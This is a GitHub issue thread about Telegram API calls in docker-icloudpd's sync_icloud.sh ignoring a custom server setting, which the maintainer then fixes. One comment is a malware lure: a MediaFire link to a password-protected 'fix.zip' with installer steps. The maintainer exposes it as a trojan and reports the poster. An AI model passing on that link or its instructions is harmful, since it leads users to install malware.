### ISSUE TITLE
telegram_http  set true but some api not changed

### ISSUE THREAD

**Issue by pkuGeo** [boredazfcuk/docker-icloudpd#637]
sync_icloud.sh line 399:

     if [ "${telegram_server}" ] ; then
               LogDebug "Checking ${telegram_server} for updates"
               bot_check="$(curl --silent -X POST "https://${telegram_server}/bot${telegram_token}/getUpdates" | jq -r
    else
               LogDebug "Checking api.telegram.org for updates"
               bot_check="$(curl --silent -X POST "https://api.telegram.org/bot${telegram_token}/getUpdates" | jq -r .
    fi

**Comment by pkuGeo** [comment]
and also line 1969:
if [ "${telegram_server}" ] ; then
                     latest_updates="$(curl --request POST --silent --data "allowed_updates=message" --data "offset=${telegram_update_id_offset_inc}" "https://${telegram_server}/bot${telegram_token}
                  else
                     latest_updates="$(curl --request POST --silent --data "allowed_updates=message" --data "offset=${telegram_update_id_offset_inc}" "https://api.telegram.org/bot${telegram_token}/g
                  fi

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by boredazfcuk** [comment]
> Download
>https://www.mediafire.com/file/o5redactedx/fix.zip/file
>password: changeme In the installer menu, select "gcc."

If you want to propose changes, do it by submitting a pull request.

Not by uploading a password/encrypted zip file instead... big lols. sus.

...and one with an executable/dll inside? bigger lols... super sus.

...and the executable being detected as Trojan:Script/Phonzy.B!ml too?

You've earned yourself a report pal.

**Comment by boredazfcuk** [comment]
> sync_icloud.sh line 399:
> 
> ```
>  if [ "${telegram_server}" ] ; then
>            LogDebug "Checking ${telegram_server} for updates"
>            bot_check="$(curl --silent -X POST "https://${telegram_server}/bot${telegram_token}/getUpdates" | jq -r
> else
>            LogDebug "Checking api.telegram.org for updates"
>            bot_check="$(curl --silent -X POST "https://api.telegram.org/bot${telegram_token}/getUpdates" | jq -r .
> fi
> ```

I've updated the code to account for this now. I found other instances in the codebase too. Thanks for pointing this out.
